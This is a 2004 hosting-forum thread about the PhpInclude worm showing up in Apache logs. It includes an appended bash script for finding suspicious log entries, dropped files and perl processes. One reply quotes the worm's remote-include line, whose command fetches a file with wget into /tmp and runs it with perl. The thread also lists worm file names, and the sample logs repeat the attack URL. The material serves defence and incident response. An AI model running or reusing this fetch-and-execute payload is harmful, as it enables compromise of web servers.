Worm? http://www.visualcoders.net/spy.gif?

Discussion in 'General Discussion' started by yuga, Dec 27, 2004.

  1. yuga

    One of my domains is getting this in the Apache logs: p=http://www.visualcoders.net/spy.gif?

    I heard it is a worm or something but could not find any reference in Google. Can anybody help me? My server is running RHES 3.0, cPanel/WHM, and PHP was already upgraded to v4.3.10.
     
  2. mike_r

    "The following exploit/worm (PhpInclude.Worm) attacks any CGI it can find using Google and Yahoo and tries to cause them to include an arbitrary PHP file that is then executed becoming the sibling of the worm."

    $lista1 = 'http://server/spy.gif?&cmd=cd /tmp;wget www.server.tld/spybot.txt; perl php.txt';
    # Other filenames included with this and other variants :
    # adfkgnnodfijg
    # bot
    # bot.txt
    # bot.txt.1
    # dry.scp
    # ssh.a
    # terrorbot.txt
    # terrorbot.txt.1
    # terrorworm.txt
    # terrorworm.txt.1
    # unbot.txt
    # unbot.txt.1
    # unbot.txt.2
    # unbot.txt.3
    # unworm.txt
    # unworm.txt.1
    # unworm.txt.2
    # unworm.txt.3
    # worm1.txt
    # worm.txt
    # worm.txt.1

    So beware of those files.
     
  3. dezignguy

    Check your /tmp, /var/tmp, and /usr/local/apache/proxy for the above-mentioned worm files.

    You can also do a find or locate for them in case they got put elsewhere on the filesystem.

    Also check your running processes for perl processes.
     
  4. dgbaker

    This technique can also be seen when a user has an unpatched phpBB forum. Ensure your forums have been updated.
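
The checks suggested in the replies above (the listed file names in the temp directories, running perl processes), together with a search of the access log for the p=http://... pattern from the first post, as an added example that is not part of the original thread. Function names and the sample log lines are constructed; the log pattern also accepts https, ftp and percent-encoded values, and the file-name pattern accepts any numeric suffix, which goes slightly beyond the exact strings quoted.

```bash
#!/usr/bin/env bash
# Added example, not from the thread. Function names and the sample
# log lines are constructed for illustration.

# Print requests in which a query parameter is set to a remote URL,
# e.g. p=http://host/spy.gif? (plain or percent-encoded).
# Reads the named log files, or stdin when none are given.
find_remote_includes() {
    grep -Ei '[?&][^=&[:space:]]+=(https?|ftp)(:|%3a)(/|%2f){2}' "$@"
}

# Print regular files under the given directories whose name is on the
# list quoted in the thread; any numeric suffix (.1, .2, ...) is accepted.
find_worm_files() {
    local dir
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f 2>/dev/null
    done | grep -E '/(adfkgnnodfijg|bot|dry[.]scp|ssh[.]a|(bot|terrorbot|terrorworm|unbot|unworm|worm1?)[.]txt([.][0-9]+)?)$'
}

# Print running perl processes with PID, owner and full command line.
list_perl_procs() {
    ps -eo pid,user,args | awk 'NR == 1 || $3 ~ /(^|\/)perl$/'
}

# Constructed access-log lines (combined log format) for a dry run.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [27/Dec/2004:10:00:01 -0500] "GET /index.php?p=http://www.visualcoders.net/spy.gif? HTTP/1.0" 200 512 "-" "-"
192.0.2.11 - - [27/Dec/2004:10:00:02 -0500] "GET /index.php?p=news HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/4.0"
192.0.2.12 - - [27/Dec/2004:10:00:03 -0500] "GET /view.php?id=3&page=HTTP%3A%2F%2Fhost.example/x.gif HTTP/1.0" 200 10 "-" "-"
EOF
}

# Dry run on the sample; on a live host pass the real log files instead
# (the log path below is a placeholder):
#   find_remote_includes /path/to/access_log
#   find_worm_files /tmp /var/tmp /usr/local/apache/proxy
#   list_perl_procs
sample_log | find_remote_includes
```

A hit in the access log only shows that the request was made; whether the include succeeded is what the file and process checks help answer.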
     